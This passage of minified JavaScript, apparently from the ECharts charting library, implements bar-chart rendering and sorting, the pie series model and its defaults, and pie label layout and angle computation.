n=e.cx,i=e.cy,r=Math.max(e.r0||0,0),o=Math.max(e.r,0),a=.5*(o-r),s=r+a,l=e.startAngle,u=e.endAngle,c=e.clockwise,h=2*Math.PI,p=c?u-l<h:l-u<h;p||(l=u-(c?h:-h));var d=Math.cos(l),f=Math.sin(l),g=Math.cos(u),v=Math.sin(u);p?(t.moveTo(d*r+n,f*r+i),t.arc(d*s+n,f*s+i,a,-Math.PI+l,l,!c)):t.moveTo(d*o+n,f*o+i),t.arc(n,i,o,l,u,!c),t.arc(g*s+n,v*s+i,a,u-2*Math.PI,u-Math.PI,!c),0!==r&&t.arc(n,i,r,u,l,c)},e}(Bl);function gC(t,e,n){return e*Math.sin(t)*(n?-1:1)}function vC(t,e,n){return e*Math.cos(t)*(n?1:-1)}function yC(t,e,n){var i=t.get("borderRadius");if(null==i)return n?{cornerRadius:0}:null;Y(i)||(i=[i,i,i,i]);var r=Math.abs(e.r||0-e.r0||0);return{cornerRadius:V(i,function(t){return qr(t,r)})}}var mC=Math.max,_C=Math.min,xC=function(t){function e(){var e=t.call(this)||this;return e.type=Qk,e._isFirstFrame=!0,e}return n(e,t),e.prototype.render=function(t,e,n,i){this._model=t,this._removeOnRenderedListener(n),this._updateDrawMode(t);var r=t.get("coordinateSystem");("cartesian2d"===r||"polar"===r)&&(this._progressiveEls=null,this._isLargeDraw?this._renderLarge(t,e,n):this._renderNormal(t,e,n,i))},e.prototype.incrementalPrepareRender=function(t){this._clear(),this._updateDrawMode(t),this._updateLargeClip(t)},e.prototype.incrementalRender=function(t,e){this._progressiveEls=[],this._incrementalRenderLarge(t,e)},e.prototype.eachRendered=function(t){_p(this._progressiveEls||this.group,t)},e.prototype._updateDrawMode=function(t){var e=t.pipelineContext.large;null!=this._isLargeDraw&&e===this._isLargeDraw||(this._isLargeDraw=e,this._clear())},e.prototype._renderNormal=function(t,e,n,i){var r,o=this.group,a=t.getData(),s=this._data,l=t.coordinateSystem,u=l.getBaseAxis();"cartesian2d"===l.type?r=u.isHorizontal():"polar"===l.type&&(r="angle"===u.dim);var c=t.isAnimationEnabled()?t:null,h=function(t,e){var n=t.get("realtimeSort",!0),i=e.getBaseAxis();0;if(n&&"category"===i.type&&"cartesian2d"===e.type)return{baseAxis:i,otherAxis:e.getOtherAxis(i)}}(t,l);h&&this._enableRealtimeSort(h,a,n);var p=t.get("clip",!0)||h,d=l.getArea();o.removeClipPath();var f=t.get("roundCap",!0),g=t.get("showBackground",!0),v=t.getModel("backgroundStyle"),y=v.get("borderRadius")||0,m=[],_=this._backgroundEls,x=i&&i.isInitSort,b=i&&"changeAxisOrder"===i.type;function w(t){var e=IC[l.type](a,t);if(!e)return null;var n=function(t,e,n){var i="polar"===t.type?eh:jl;return new i({shape:NC(e,n,t),silent:!0,z2:0})}(l,r,e);return n.useStyle(v.getItemStyle()),"cartesian2d"===l.type?n.setShape("r",y):n.setShape("cornerRadius",y),m[t]=n,n}a.diff(s).add(function(e){var n=a.getItemModel(e),i=IC[l.type](a,e,n);if(i&&(g&&w(e),a.hasValue(e)&&CC[l.type](i))){var s=!1;p&&(s=bC[l.type](d,i));var v=wC[l.type](t,a,e,i,r,c,u.model,!1,f);h&&(v.forceLabelAnimation=!0),AC(v,a,e,n,i,t,r,"polar"===l.type),x?v.attr({shape:i}):h?SC(h,c,v,i,e,r,!1,!1):zh(v,{shape:i},t,e),a.setItemGraphicEl(e,v),o.add(v),v.ignore=s}}).update(function(e,n){var i=a.getItemModel(e),S=IC[l.type](a,e,i);if(S){if(g){var M=void 0;0===_.length?M=w(n):((M=_[n]).useStyle(v.getItemStyle()),"cartesian2d"===l.type?M.setShape("r",y):M.setShape("cornerRadius",y),m[e]=M);var T=IC[l.type](a,e);Bh(M,{shape:NC(r,T,l)},c,e)}var k=s.getItemGraphicEl(n);if(a.hasValue(e)&&CC[l.type](S)){var C=!1;if(p&&(C=bC[l.type](d,S))&&o.remove(k),k&&("sector"===k.type&&f||"sausage"===k.type&&!f)&&(k&&Hh(k,t,n),k=null),k?Gh(k):k=wC[l.type](t,a,e,S,r,c,u.model,!0,f),h&&(k.forceLabelAnimation=!0),b){var I=k.getTextContent();if(I){var D=Fp(I);null!=D.prevValue&&(D.prevValue=D.value)}}else AC(k,a,e,i,S,t,r,"polar"===l.type);x?k.attr({shape:S}):h?SC(h,c,k,S,e,r,!0,b):Bh(k,{shape:S},t,e,null),a.setItemGraphicEl(e,k),k.ignore=C,o.add(k)}else o.remove(k)}}).remove(function(e){var n=s.getItemGraphicEl(e);n&&Hh(n,t,e)}).execute();var S=this._backgroundGroup||(this._backgroundGroup=new ho);S.removeAll();for(var M=0;M<m.length;++M)S.add(m[M]);o.add(S),this._backgroundEls=m,this._data=a},e.prototype._renderLarge=function(t,e,n){this._clear(),OC(t,this.group),this._updateLargeClip(t)},e.prototype._incrementalRenderLarge=function(t,e){this._removeBackground(),OC(e,this.group,this._progressiveEls,!0)},e.prototype._updateLargeClip=function(t){var e=t.get("clip",!0)&&function(t,e,n,i,r){return t?"polar"===t.type?XT(t,e,n):"cartesian2d"===t.type?YT(t,e,n,i,r):null:null}(t.coordinateSystem,!1,t),n=this.group;e?n.setClipPath(e):n.removeClipPath()},e.prototype._enableRealtimeSort=function(t,e,n){var i=this;if(e.count()){var r=t.baseAxis;if(this._isFirstFrame)this._dispatchInitSort(e,t,n),this._isFirstFrame=!1;else{var o=function(t){var n=e.getItemGraphicEl(t),i=n&&n.shape;return i&&Math.abs(r.isHorizontal()?i.height:i.width)||0};this._onRendered=function(){i._updateSortWithinSameData(e,o,r,n)},n.getZr().on("rendered",this._onRendered)}}},e.prototype._dataSort=function(t,e,n){var i=[];return t.each(t.mapDimension(e.dim),function(t,e){var r=n(e);r=null==r?NaN:r,i.push({dataIndex:e,mappedValue:r,ordinalNumber:t})}),i.sort(function(t,e){return e.mappedValue-t.mappedValue}),{ordinalNumbers:V(i,function(t){return t.ordinalNumber})}},e.prototype._isOrderChangedWithinSameData=function(t,e,n){for(var i=n.scale,r=t.mapDimension(n.dim),o=Number.MAX_VALUE,a=0,s=i.getOrdinalMeta().categories.length;a<s;++a){var l=t.rawIndexOf(r,i.getRawOrdinalNumber(a)),u=l<0?Number.MIN_VALUE:e(t.indexOfRawIndex(l));if(u>o)return!0;o=u}return!1},e.prototype._isOrderDifferentInView=function(t,e){for(var n=e.scale,i=n.getExtent(),r=Math.max(0,i[0]),o=Math.min(i[1],n.getOrdinalMeta().categories.length-1);r<=o;++r)if(t.ordinalNumbers[r]!==n.getRawOrdinalNumber(r))return!0},e.prototype._updateSortWithinSameData=function(t,e,n,i){if(this._isOrderChangedWithinSameData(t,e,n)){var r=this._dataSort(t,n,e);this._isOrderDifferentInView(r,n)&&(this._removeOnRenderedListener(i),i.dispatchAction({type:"changeAxisOrder",componentType:n.dim+"Axis",axisId:n.index,sortInfo:r}))}},e.prototype._dispatchInitSort=function(t,e,n){var i=e.baseAxis,r=this._dataSort(t,i,function(n){return t.get(t.mapDimension(e.otherAxis.dim),n)});n.dispatchAction({type:"changeAxisOrder",componentType:i.dim+"Axis",isInitSort:!0,axisId:i.index,sortInfo:r})},e.prototype.remove=function(t,e){this._clear(this._model),this._removeOnRenderedListener(e)},e.prototype.dispose=function(t,e){this._removeOnRenderedListener(e)},e.prototype._removeOnRenderedListener=function(t){this._onRendered&&(t.getZr().off("rendered",this._onRendered),this._onRendered=null)},e.prototype._clear=function(t){var e=this.group,n=this._data;t&&t.isAnimationEnabled()&&n&&!this._isLargeDraw?(this._removeBackground(),this._backgroundEls=[],n.eachItemGraphicEl(function(e){Hh(e,t,hu(e).dataIndex)})):e.removeAll(),this._data=null,this._isFirstFrame=!0},e.prototype._removeBackground=function(){this.group.remove(this._backgroundGroup),this._backgroundGroup=null},e.type=Qk,e}(cy),bC={cartesian2d:function(t,e){var n=e.width<0?-1:1,i=e.height<0?-1:1;n<0&&(e.x+=e.width,e.width=-e.width),i<0&&(e.y+=e.height,e.height=-e.height);var r=t.x+t.width,o=t.y+t.height,a=mC(e.x,t.x),s=_C(e.x+e.width,r),l=mC(e.y,t.y),u=_C(e.y+e.height,o),c=s<a,h=u<l;return e.x=c&&a>r?s:a,e.y=h&&l>o?u:l,e.width=c?0:s-a,e.height=h?0:u-l,n<0&&(e.x+=e.width,e.width=-e.width),i<0&&(e.y+=e.height,e.height=-e.height),c||h},polar:function(t,e){var n=e.r0<=e.r?1:-1;if(n<0){var i=e.r;e.r=e.r0,e.r0=i}var r=_C(e.r,t.r),o=mC(e.r0,t.r0);e.r=r,e.r0=o;var a=r-o<0;if(n<0){i=e.r;e.r=e.r0,e.r0=i}return a}},wC={cartesian2d:function(t,e,n,i,r,o,a,s,l){var u=new jl({shape:A({},i),z2:1});(u.__dataIndex=n,u.name="item",o)&&(u.shape[r?"height":"width"]=0);return u},polar:function(t,e,n,i,r,o,a,s,l){var u=!r&&l?fC:eh,c=new u({shape:i,z2:1});c.name="item";var h,p,d=DC(r);if(c.calculateTextPosition=(h=d,p=({isRoundCap:u===fC}||{}).isRoundCap,function(t,e,n){var i=e.position;if(!i||i instanceof Array)return Kr(t,e,n);var r=h(i),o=null!=e.distance?e.distance:5,a=this.shape,s=a.cx,l=a.cy,u=a.r,c=a.r0,d=(u+c)/2,f=a.startAngle,g=a.endAngle,v=(f+g)/2,y=p?Math.abs(u-c)/2:0,m=Math.cos,_=Math.sin,x=s+u*m(f),b=l+u*_(f),w="left",S="top";switch(r){case"startArc":x=s+(c-o)*m(v),b=l+(c-o)*_(v),w="center",S="top";break;case"insideStartArc":x=s+(c+o)*m(v),b=l+(c+o)*_(v),w="center",S="bottom";break;case"startAngle":x=s+d*m(f)+gC(f,o+y,!1),b=l+d*_(f)+vC(f,o+y,!1),w="right",S="middle";break;case"insideStartAngle":x=s+d*m(f)+gC(f,-o+y,!1),b=l+d*_(f)+vC(f,-o+y,!1),w="left",S="middle";break;case"middle":x=s+d*m(v),b=l+d*_(v),w="center",S="middle";break;case"endArc":x=s+(u+o)*m(v),b=l+(u+o)*_(v),w="center",S="bottom";break;case"insideEndArc":x=s+(u-o)*m(v),b=l+(u-o)*_(v),w="center",S="top";break;case"endAngle":x=s+d*m(g)+gC(g,o+y,!0),b=l+d*_(g)+vC(g,o+y,!0),w="left",S="middle";break;case"insideEndAngle":x=s+d*m(g)+gC(g,-o+y,!0),b=l+d*_(g)+vC(g,-o+y,!0),w="right",S="middle";break;default:return Kr(t,e,n)}return(t=t||{}).x=x,t.y=b,t.align=w,t.verticalAlign=S,t}),o){var f=r?"r":"endAngle",g={};c.shape[f]=r?i.r0:i.startAngle,g[f]=i[f],(s?Bh:zh)(c,{shape:g},o)}return c}};function SC(t,e,n,i,r,o,a,s){var l,u;o?(u={x:i.x,width:i.width},l={y:i.y,height:i.height}):(u={y:i.y,height:i.height},l={x:i.x,width:i.width}),s||(a?Bh:zh)(n,{shape:l},e,r,null),(a?Bh:zh)(n,{shape:u},e?t.baseAxis.model:null,r)}function MC(t,e){for(var n=0;n<e.length;n++)if(!isFinite(t[e[n]]))return!0;return!1}var TC=["x","y","width","height"],kC=["cx","cy","r","startAngle","endAngle"],CC={cartesian2d:function(t){return!MC(t,TC)},polar:function(t){return!MC(t,kC)}},IC={cartesian2d:function(t,e,n){var i=t.getItemLayout(e);if(!i)return null;var r=n?function(t,e){var n=t.get(["itemStyle","borderColor"]);if(!n||"none"===n)return 0;var i=t.get(["itemStyle","borderWidth"])||0,r=isNaN(e.width)?Number.MAX_VALUE:Math.abs(e.width),o=isNaN(e.height)?Number.MAX_VALUE:Math.abs(e.height);return Math.min(i,r,o)}(n,i):0,o=i.width>0?1:-1,a=i.height>0?1:-1;return{x:i.x+o*r/2,y:i.y+a*r/2,width:i.width-o*r,height:i.height-a*r}},polar:function(t,e,n){var i=t.getItemLayout(e);return{cx:i.cx,cy:i.cy,r0:i.r0,r:i.r,startAngle:i.startAngle,endAngle:i.endAngle,clockwise:i.clockwise}}};function DC(t){return function(t){var e=t?"Arc":"Angle";return function(t){switch(t){case"start":case"insideStart":case"end":case"insideEnd":return t+e;default:return t}}}(t)}function AC(t,e,n,i,r,o,a,s){var l=e.getItemVisual(n,"style");if(s){if(!o.get("roundCap")){var u=t.shape;A(u,yC(i.getModel("itemStyle"),u,!0)),t.setShape(u)}}else{var c=i.get(["itemStyle","borderRadius"])||0;t.setShape("r",c)}t.useStyle(l);var h=i.getShallow("cursor");h&&t.attr("cursor",h);var p=s?a?r.r>=r.r0?"endArc":"startArc":r.endAngle>=r.startAngle?"endAngle":"startAngle":a?function(t,e){if(0===t.height){return e.getOtherAxis(e.getBaseAxis()).inverse?"bottom":"top"}return t.height>0?"bottom":"top"}(r,o.coordinateSystem):function(t,e){if(0===t.width){return e.getOtherAxis(e.getBaseAxis()).inverse?"left":"right"}return t.width>=0?"right":"left"}(r,o.coordinateSystem),d=Lp(i);Pp(t,d,{labelFetcher:o,labelDataIndex:n,defaultText:ST(o.getData(),n),inheritColor:l.fill,defaultOpacity:l.opacity,defaultOutsidePosition:p});var f=t.getTextContent();if(s&&f){var g=i.get(["label","position"]);t.textConfig.inside="middle"===g||null,function(t,e,n,i){if(K(i))t.setTextConfig({rotation:i});else if(Y(e))t.setTextConfig({rotation:0});else{var r,o=t.shape,a=o.clockwise?o.startAngle:o.endAngle,s=o.clockwise?o.endAngle:o.startAngle,l=(a+s)/2,u=n(e);switch(u){case"startArc":case"insideStartArc":case"middle":case"insideEndArc":case"endArc":r=l;break;case"startAngle":case"insideStartAngle":r=a;break;case"endAngle":case"insideEndAngle":r=s;break;default:return void t.setTextConfig({rotation:0})}var c=1.5*Math.PI-r;"middle"===u&&c>Math.PI/2&&c<1.5*Math.PI&&(c-=Math.PI),t.setTextConfig({rotation:c})}}(t,"outside"===g?p:g,DC(a),i.get(["label","rotate"]))}!function(t,e,n,i){if(t){var r=Fp(t);r.prevValue=r.value,r.value=n;var o=e.normal;r.valueAnimation=o.get("valueAnimation"),r.valueAnimation&&(r.precision=o.get("precision"),r.defaultInterpolatedText=i,r.statesModels=e)}}(f,d,o.getRawValue(n),function(t){return MT(e,t)});var v=i.getModel(["emphasis"]);pc(t,v.get("focus"),v.get("blurScope"),v.get("disabled")),gc(t,i),function(t){return null!=t.startAngle&&null!=t.endAngle&&t.startAngle===t.endAngle}(r)&&(t.style.fill="none",t.style.stroke="none",E(t.states,function(t){t.style&&(t.style.fill=t.style.stroke="none")}))}var PC=function(){},LC=function(t){function e(e){var n=t.call(this,e)||this;return n.type="largeBar",n}return n(e,t),e.prototype.getDefaultShape=function(){return new PC},e.prototype.buildPath=function(t,e){for(var n=e.points,i=this.baseDimIdx,r=1-this.baseDimIdx,o=[],a=[],s=this.barWidth,l=0;l<n.length;l+=3)a[i]=s,a[r]=n[l+2],o[i]=n[l+i],o[r]=n[l+r],t.rect(o[0],o[1],a[0],a[1])},e}(Bl);function OC(t,e,n,i){var r=t.getData(),o=r.getLayout("valueAxisHorizontal")?1:0,a=r.getLayout("largeDataIndices"),s=r.getLayout("size"),l=t.getModel("backgroundStyle"),u=r.getLayout("largeBackgroundPoints"),c=i?Za(t):0;if(u){var h=new LC({shape:{points:u},incremental:c,silent:!0,z2:0});h.baseDimIdx=o,h.largeDataIndices=a,h.barWidth=s,h.useStyle(l.getItemStyle()),e.add(h),n&&n.push(h)}var p=new LC({shape:{points:r.getLayout("largePoints")},incremental:c,ignoreCoarsePointer:!0,z2:1});p.baseDimIdx=o,p.largeDataIndices=a,p.barWidth=s,e.add(p),p.useStyle(r.getVisual("style")),p.style.stroke=null,hu(p).seriesIndex=t.seriesIndex,t.get("silent")||(p.on("mousedown",RC),p.on("mousemove",RC)),n&&n.push(p)}var RC=_y(function(t){var e=function(t,e,n){for(var i=t.baseDimIdx,r=1-i,o=t.shape.points,a=t.largeDataIndices,s=[],l=[],u=t.barWidth,c=0,h=o.length/3;c<h;c++){var p=3*c;if(l[i]=u,l[r]=o[p+2],s[i]=o[p+i],s[r]=o[p+r],l[r]<0&&(s[r]+=l[r],l[r]=-l[r]),e>=s[0]&&e<=s[0]+l[0]&&n>=s[1]&&n<=s[1]+l[1])return a[c]}return-1}(this,t.offsetX,t.offsetY);hu(this).dataIndex=e>=0?e:null},30,!1);function NC(t,e,n){if(qT(n,"cartesian2d")){var i=e,r=n.getArea();return{x:t?i.x:r.x,y:t?r.y:i.y,width:t?i.width:r.width,height:t?r.height:i.height}}var o=e;return{cx:(r=n.getArea()).cx,cy:r.cy,r0:t?r.r0:o.r0,r:t?r.r:o.r,startAngle:t?o.startAngle:0,endAngle:t?o.endAngle:2*Math.PI}}var BC,zC=function(){function t(t,e){this._getDataWithEncodedVisual=t,this._getRawData=e}return t.prototype.getAllNames=function(){var t=this._getRawData();return t.mapArray(t.getName)},t.prototype.containName=function(t){return this._getRawData().indexOfName(t)>=0},t.prototype.indexOfName=function(t){return this._getDataWithEncodedVisual().indexOfName(t)},t.prototype.getItemVisual=function(t,e){return this._getDataWithEncodedVisual().getItemVisual(t,e)},t}(),EC="pie",VC=Ta(),FC=function(t){function e(){var n=null!==t&&t.apply(this,arguments)||this;return n.type=e.type,n}return n(e,t),e.prototype.init=function(e){t.prototype.init.apply(this,arguments),this.legendVisualProvider=new zC(U(this.getData,this),U(this.getRawData,this)),this._defaultLabelLine(e)},e.prototype.mergeOption=function(){t.prototype.mergeOption.apply(this,arguments)},e.prototype.getInitialData=function(){return function(t,e,n){e=Y(e)&&{coordDimensions:e}||A({encodeDefine:t.getEncode()},e);var i=t.getSource(),r=Xx(i,e).dimensions,o=new Yx(r,t);return o.initData(i,n),o}(this,{coordDimensions:["value"],encodeDefaulter:Z(Hf,this)})},e.prototype.getDataParams=function(e){var n=this.getData(),i=VC(n),r=i.seats;if(!r){var o=[];n.each(n.mapDimension("value"),function(t){o.push(t)}),r=i.seats=Go(o,n.hostModel.get("percentPrecision"))}var a=t.prototype.getDataParams.call(this,e);return a.percent=r[e]||0,a.$vars.push("percent"),a},e.prototype._defaultLabelLine=function(t){fa(t,"labelLine",["show"]);var e=t.labelLine,n=t.emphasis.labelLine;e.show=e.show&&t.label.show,n.show=n.show&&t.emphasis.label.show},e.type="series."+EC,e.defaultOption={z:2,legendHoverLink:!0,colorBy:"data",center:["50%","50%"],radius:[0,"50%"],clockwise:!0,startAngle:90,endAngle:"auto",padAngle:0,minAngle:0,minShowLabelAngle:0,selectedOffset:10,percentPrecision:2,stillShowZeroSum:!0,coordinateSystemUsage:"box",left:0,top:0,right:0,bottom:0,width:null,height:null,label:{rotate:0,show:!0,overflow:"truncate",position:"outer",alignTo:"none",edgeDistance:"25%",distanceToLabelLine:5},labelLine:{show:!0,length:15,length2:30,smooth:!1,minTurnAngle:90,maxSurfaceAngle:90,lineStyle:{width:1,type:"solid"}},itemStyle:{borderWidth:1,borderJoin:"round"},showEmptyCircle:!0,emptyCircleStyle:{color:"lightgray",opacity:1},labelLayout:{hideOverlap:!0},emphasis:{scale:!0,scaleSize:5},avoidLabelOverlap:!0,animationType:"expansion",animationDuration:1e3,animationTypeUpdate:"transition",animationEasingUpdate:"cubicInOut",animationDurationUpdate:500,animationEasing:"cubicInOut"},e}(Qv);BC={fullType:FC.type,getCoord2:function(t){return t.getShallow("center")}},lf.set(BC.fullType,{getCoord2:void 0}).getCoord2=BC.getCoord2;var HC=Math.PI/180;function GC(t,e,n,i,r,o,a,s,l,u){if(!(t.length<2)){for(var c=t.length,h=0;h<c;h++)if("outer"===t[h].position&&"labelLine"===t[h].labelAlignTo){var p=t[h].label.x-u;t[h].linePoints[1][0]+=p,t[h].label.x=u}(function(t,e,n,i,r){var o=t.length,a=Uh[e],s=Zh[e];if(o<2)return!1;t.sort(function(t,e){return t.rect[a]-e.rect[a]});for(var l,u=0,c=!1,h=0,p=0;p<o;p++){var d=t[p],f=d.rect;(l=f[a]-u)<0&&(f[a]-=l,d.label[a]-=l,c=!0),h+=Math.max(-l,0),u=f[a]+f[s]}h>0&&r&&b(-h/o,0,o);var g,v,y=t[0],m=t[o-1];function _(){g=y.rect[a]-n,v=i-m.rect[a]-m.rect[s]}function x(t,e,n){if(t<0){var i=Math.min(e,-t);if(i>0){b(i*n,0,o);var r=i+t;r<0&&w(-r*n,1)}else w(-t*n,1)}}function b(e,n,i){0!==e&&(c=!0);for(var r=n;r<i;r++){var o=t[r];o.rect[a]+=e,o.label[a]+=e}}function w(e,n){for(var i=[],r=0,l=1;l<o;l++){var u=t[l-1].rect,c=Math.max(t[l].rect[a]-u[a]-u[s],0);i.push(c),r+=c}if(r){var h=Math.min(Math.abs(e)/r,n);if(e>0)for(l=0;l<o-1;l++)b(i[l]*h,0,l+1);else for(l=o-1;l>0;l--)b(-i[l-1]*h,l,o)}}function S(t){var e=t<0?-1:1;t=Math.abs(t);for(var n=Math.ceil(t/(o-1)),i=0;i<o-1;i++)if(e>0?b(n,0,i+1):b(-n,o-i-1,o),(t-=n)<=0)return}return _(),g<0&&w(-g,.8),v<0&&w(v,.8),_(),x(g,v,1),x(v,g,-1),_(),g<0&&S(-g),v<0&&S(v),c})(t,1,l,l+a)&&function(t){for(var o={list:[],maxY:0},a={list:[],maxY:0},s=0;s<t.length;s++)if("none"===t[s].labelAlignTo){var l=t[s],u=l.label.y>n?a:o,c=Math.abs(l.label.y-n);if(c>=u.maxY){var h=l.label.x-e-l.len2*r,p=i+l.len,f=Math.abs(h)<p?Math.sqrt(c*c/(1-h*h/p/p)):p;u.rB=f,u.maxY=c}u.list.push(l)}d(o),d(a)}(t)}function d(t){for(var o=t.rB,a=o*o,s=0;s<t.list.length;s++){var l=t.list[s],u=Math.abs(l.label.y-n),c=i+l.len,h=c*c,p=Math.sqrt(Math.abs((1-u*u/a)*h)),d=e+(p+l.len2)*r,f=d-l.label.x;WC(l,l.targetTextWidth-f*r,!0),l.label.x=d}}}function WC(t,e,n){if(null==t.labelStyleWidth){var i=t.label,r=i.style,o=t.rect,a=r.backgroundColor,s=r.padding,l=s?s[1]+s[3]:0,u=r.overflow,c=o.width+(a?0:l);if(e<c||n){if(u&&u.match("break")){i.setStyle("backgroundColor",null),i.setStyle("width",e-l);var h=i.getBoundingRect();i.setStyle("width",Math.ceil(h.width)),i.setStyle("backgroundColor",a)}else{var p=e-l,d=e<c?p:n?p>t.unconstrainedWidth?null:p:null;i.setStyle("width",d)}UC(o,i)}}}function UC(t,e){YC.rect=t,FS(YC,e,ZC)}var ZC={minMarginForce:[null,0,null,0],marginDefault:[1,0,1,0]},YC={};function XC(t){return"center"===t.position}function jC(t){var e,n,i=t.getData(),r=[],o=!1,a=(t.get("minShowLabelAngle")||0)*HC,s=i.getLayout("viewRect"),l=i.getLayout("r"),u=s.width,c=s.x,h=s.y,p=s.height;function d(t){t.ignore=!0}i.each(function(t){var s=i.getItemGraphicEl(t),h=s.shape,f=s.getTextContent(),g=s.getTextGuideLine(),v=i.getItemModel(t),y=v.getModel("label"),m=y.get("position")||v.get(["emphasis","label","position"]),_=y.get("distanceToLabelLine"),x=y.get("alignTo"),b=No(y.get("edgeDistance"),u),w=y.get("bleedMargin");null==w&&(w=Math.min(u,p)>200?10:2);var S=v.getModel("labelLine"),M=S.get("length");M=No(M,u);var T=S.get("length2");if(T=No(T,u),Math.abs(h.endAngle-h.startAngle)<a)return E(f.states,d),f.ignore=!0,void(g&&(E(g.states,d),g.ignore=!0));if(function(t){if(!t.ignore)return!0;for(var e in t.states)if(!1===t.states[e].ignore)return!0;return!1}(f)){var k,C,I,D,A=(h.startAngle+h.endAngle)/2,P=Math.cos(A),L=Math.sin(A);e=h.cx,n=h.cy;var O="inside"===m||"inner"===m;if("center"===m)k=h.cx,C=h.cy,D="center";else{var R=(O?(h.r+h.r0)/2*P:h.r*P)+e,N=(O?(h.r+h.r0)/2*L:h.r*L)+n;if(k=R+3*P,C=N+3*L,!O){var B=R+P*(M+l-h.r),z=N+L*(M+l-h.r),V=B+(P<0?-1:1)*T;k="edge"===x?P<0?c+b:c+u-b:V+(P<0?-_:_),C=z,I=[[R,N],[B,z],[V,z]]}D=O?"center":"edge"===x?P>0?"right":"left":P>0?"left":"right"}var F=Math.PI,H=0,G=y.get("rotate");if(K(G))H=G*(F/180);else if("center"===m)H=0;else if("radial"===G||!0===G){H=P<0?-A+F:-A}else if("tangential"===G||"tangential-noflip"===G&&"outside"!==m&&"outer"!==m){var W=Math.atan2(P,L);W<0&&(W=2*F+W),L>0&&"tangential-noflip"!==G&&(W=F+W),H=W-F}if(o=!!H,f.x=k,f.y=C,f.rotation=H,f.setStyle({verticalAlign:"middle"}),O){f.setStyle({align:D});var U=f.states.select;U&&(U.x+=f.x,U.y+=f.y)}else{var Z=new Ue(0,0,0,0);UC(Z,f),r.push({label:f,labelLine:g,position:m,len:M,len2:T,minTurnAngle:S.get("minTurnAngle"),maxSurfaceAngle:S.get("maxSurfaceAngle"),surfaceNormal:new Ae(P,L),linePoints:I,textAlign:D,labelDistance:_,labelAlignTo:x,edgeDistance:b,bleedMargin:w,rect:Z,unconstrainedWidth:Z.width,labelStyleWidth:f.style.width})}s.setTextConfig({inside:O})}}),!o&&t.get("avoidLabelOverlap")&&function(t,e,n,i,r,o,a,s){for(var l=[],u=[],c=Number.MAX_VALUE,h=-Number.MAX_VALUE,p=0;p<t.length;p++){var d=t[p].label;XC(t[p])||(d.x<e?(c=Math.min(c,d.x),l.push(t[p])):(h=Math.max(h,d.x),u.push(t[p])))}for(p=0;p<t.length;p++)if(!XC(v=t[p])&&v.linePoints){if(null!=v.labelStyleWidth)continue;d=v.label;var f=v.linePoints,g=void 0;g="edge"===v.labelAlignTo?d.x<e?f[2][0]-v.labelDistance-a-v.edgeDistance:a+r-v.edgeDistance-f[2][0]-v.labelDistance:"labelLine"===v.labelAlignTo?d.x<e?c-a-v.bleedMargin:a+r-h-v.bleedMargin:d.x<e?d.x-a-v.bleedMargin:a+r-d.x-v.bleedMargin,v.targetTextWidth=g,WC(v,g,!1)}for(GC(u,e,n,i,1,0,o,0,s,h),GC(l,e,n,i,-1,0,o,0,s,c),p=0;p<t.length;p++){var v;if(!XC(v=t[p])&&v.linePoints){d=v.label,f=v.linePoints;var y="edge"===v.labelAlignTo,m=d.style.padding,_=m?m[1]+m[3]:0,x=d.style.backgroundColor?0:_,b=v.rect.width+x,w=f[1][0]-f[2][0];y?d.x<e?f[2][0]=a+v.edgeDistance+b+v.labelDistance:f[2][0]=a+r-v.edgeDistance-b-v.labelDistance:(d.x<e?f[2][0]=d.x+v.labelDistance:f[2][0]=d.x-v.labelDistance,f[1][0]=f[2][0]+w),f[1][1]=f[2][1]=d.y}}}(r,e,n,l,u,p,c,h);for(var f=0;f<r.length;f++){var g=r[f],v=g.label,y=g.labelLine,m=isNaN(v.x)||isNaN(v.y);if(v){v.setStyle({align:g.textAlign}),m&&(E(v.states,d),v.ignore=!0);var _=v.states.select;_&&(_.x+=v.x,_.y+=v.y)}if(y){var x=g.linePoints;m||!x?(E(y.states,d),y.ignore=!0):(LS(x,g.minTurnAngle),OS(x,g.surfaceNormal,g.maxSurfaceAngle),y.setShape({points:x}),v.__hostTarget.textGuideLineConfig={anchor:new Ae(x[0][0],x[0][1])})}}}var qC=2*Math.PI,KC=Math.PI/180,$C=function(t,e){return{seriesType:t,overallReset:e}}(EC,function(t,e){t.eachSeriesByType(EC,function(t){var n=t.getData(),i=n.mapDimension("value"),r=vf(t,e),o=r.cx,a=r.cy,s=r.r,l=r.r0,u=r.viewRect,c=-t.get("startAngle")*KC,h=t.get("endAngle"),p=t.get("padAngle")*KC;h="auto"===h?c-qC:-h*KC;var d=t.get("minAngle")*KC+p,f=0;n.each(i,function(t){!isNaN(t)&&f++});var g=n.getSum(i),v=Math.PI/(g||f)*2,y=t.get("clockwise"),m=t.get("roseType"),_=t.get("stillShowZeroSum"),x=n.getDataExtent(i);x[0]=0;var b=y?1:-1,w=[c,h],S=b*p/2;fl(w,!y),c=w[0],h=w[1];var M=QC(t);M.startAngle=c,M.endAngle=h,M.clockwise=y,M.cx=o,M.cy=a,M.r=s,M.r0=l;var T=Math.abs(h-c),k=T,C=0,I=c;if(n.setLayout({viewRect:u,r:s}),n.each(i,function(t,e){var i;if(isNaN(t))n.setItemLayout(e,{angle:NaN,startAngle:NaN,endAngle:NaN,clockwise:y,cx:o,cy:a,r0:l,r:m?NaN:s});else{(i="area"!==m?0===g&&_?v:t*v:T/f)<d?(i=d,k-=d):C+=t;var r=I+b*i,u=0,c=0;p>i?c=u=I+b*i/2:(u=I+S,c=r-S),n.setItemLayout(e,{angle:i,startAngle:u,endAngle:c,clockwise:y,cx:o,cy:a,r0:l,r:m?Ro(t,x,[l,s]):s}),I=r}}),k<qC&&f)if(k<=.001){var D=T/f;n.each(i,function(t,e){if(!isNaN(t)){var i=n.getItemLayout(e);i.angle=D;var r=0,o=0;D<p?o=r=c+b*(e+.5)*D:(r=c+b*e*D+S,o=c+b*(e+1)*D-S),i.startAngle=r,i.endAngle=o}})}else v=k/C,I=c,n.each(i,function(t,e){if(!isNaN(t)){var i=n.getItemLayout(e),r=i.angle===d?d:t*v,o=0,a=0;r<p?a=o=I+b*r/2:(o=I+S,a=I+b*r-S),i.startAngle=o,i.endAngle=a,I+=b*r}})})});var QC=Ta(),JC=function(t){function e(e,n,i){var r=t.call(this)||this;r.z2=2;var o=new Ql;return r.setTextContent(o),r.updateData(e,n,i,!0),r}return n(e,t),e.prototype.updateData=function(t,e,n,i){var r=this,o=t.hostModel,a=t.getItemModel(e),s=a.getModel("emphasis"),l=t.getItemLayout(e),u=A(yC(a.getModel("itemStyle"),l,!0),l);if(isNaN(u.startAngle))r.setShape(u);else{if(i){r.setShape(u);var 